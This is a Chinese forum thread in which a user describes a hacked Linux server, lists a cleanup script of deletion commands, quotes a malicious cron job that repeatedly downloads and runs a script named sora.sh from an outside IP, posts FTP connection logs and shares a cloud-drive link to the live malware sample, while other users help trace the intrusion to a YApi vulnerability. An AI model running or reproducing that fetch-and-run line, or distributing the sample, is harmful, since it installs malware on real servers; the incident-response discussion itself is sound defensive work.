网站 › 『病毒救援区』 › 服务器被入侵，删除病毒文件，只要开放22远程端口又马上出现病毒文件

Reer 发表于 2021-9-23 18:58

服务器被入侵，删除病毒文件，只要开放22远程端口又马上出现病毒文件

服务器被入侵，使用clamscan扫描删除病毒文件，删除病毒相关文件，处理教程来自 https://blog.php110.top/home/index/detail/id/6923.html
#!/bin/bash
rm -f /bin/netstat
rm -f /bin/ps
rm -f /usr/sbin/lsof
rm -f /usr/sbin/ss
rm -rf /usr/bin/dpkgd
rm -rf /usr/bin/bsd-port
rm -f /usr/bin/.sshd
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux

后面发现留下定时任务
*/30 * * * * cd /; wget http://209.141.45.139/bins/sora.sh; curl -O http://209.141.45.139/bins/sora.sh;chmod 777 *;sh sora.sh >/dev/null 2>&1

在/tmp 目录下存在病毒的运行程序。由于删除他好多遍之后，病毒运行文件名称改名“rini”,猜测自己中国人搞的，真是服了，有能力去搞搞外国，搞自己国家个测试服务器干嘛
javascript:;

这里附上病毒运行程序，希望哪位大神可以帮忙看一下。服务器密码已经改过好很多遍了，但还是只要开启22端口，病毒文件那些又全部进来了。

链接：https://pan.baidu.com/s/1RMzuoohkK-t4v4A1jy2yJA
提取码：7777

Reer 发表于 2021-9-24 14:18

cutthesoul 发表于 2021-9-24 13:19
刚刚没细看，病毒文件是root用户组 不代表一定是通过root账户登录后投放的。部分web组件是有提权漏洞的， ...

这个就难搞，把pure-ftpd也关了。message日志有很多
Sep 12 16:42:45 instance-h9dmdtvz pure-ftpd: (?@162.142.125.41) New connection from 162.142.125.41
Sep 12 16:42:46 instance-h9dmdtvz pure-ftpd: (?@162.142.125.41) Logout.
Sep 12 17:32:51 instance-h9dmdtvz pure-ftpd: (?@184.105.247.252) New connection from 184.105.247.252
Sep 12 17:32:52 instance-h9dmdtvz pure-ftpd: (?@184.105.247.252) Logout.
Sep 13 01:10:19 instance-h9dmdtvz pure-ftpd: (?@192.241.208.20) New connection from 192.241.208.20
Sep 13 01:10:19 instance-h9dmdtvz pure-ftpd: (?@192.241.208.20) Logout.
Sep 13 01:42:30 instance-h9dmdtvz pure-ftpd: (?@192.241.207.181) New connection from 192.241.207.181
Sep 13 01:42:30 instance-h9dmdtvz pure-ftpd: (?@192.241.207.181) Logout.
Sep 13 02:12:25 instance-h9dmdtvz pure-ftpd: (?@144.86.173.10) New connection from 144.86.173.10
Sep 13 02:12:25 instance-h9dmdtvz pure-ftpd: (?@144.86.173.10) Logout.

cutthesoul 发表于 2021-9-24 13:19

Reer 发表于 2021-9-24 11:54
rm -f /usr/bin/.sshd
/root/.ssh/authorized_keys 文件是空的，

刚刚没细看，病毒文件是root用户组 不代表一定是通过root账户登录后投放的。部分web组件是有提权漏洞的，如果这些文件的更改和修改时间，你确定没有其他账户通过ssh登录，更建议你排查下服务器对外开放的其他业务组件 是否有提权漏洞

cutthesoul 发表于 2021-9-24 11:40

.ssh目录下的免密公钥看了吗？

Reer 发表于 2021-9-24 11:54

本帖最后由 Reer 于 2021-9-24 11:57 编辑

cutthesoul 发表于 2021-9-24 11:40
.ssh目录下的免密公钥看了吗？
rm -f /usr/bin/.sshd
/root/.ssh/authorized_keys 文件是空的，

kiopc 发表于 2021-9-24 14:43

网盘里面这个是什么文件啊？打开之后怎么都是乱码啊

Reer 发表于 2021-9-24 14:50

kiopc 发表于 2021-9-24 14:43
网盘里面这个是什么文件啊？打开之后怎么都是乱码啊

病毒程序文件，小心{:1_925:}

kiopc 发表于 2021-9-24 14:54

Reer 发表于 2021-9-24 14:50
病毒程序文件，小心


不知道为啥，打开之后是这种

flyjerry 发表于 2021-10-20 13:29

乱码病毒么？

Reer 发表于 2021-10-20 16:11

flyjerry 发表于 2021-10-20 13:29
乱码病毒么？

是的，能看出来跑了啥不，后面找到yapi漏洞进去的

查看完整版本: 服务器被入侵，删除病毒文件，只要开放22远程端口又马上出现病毒文件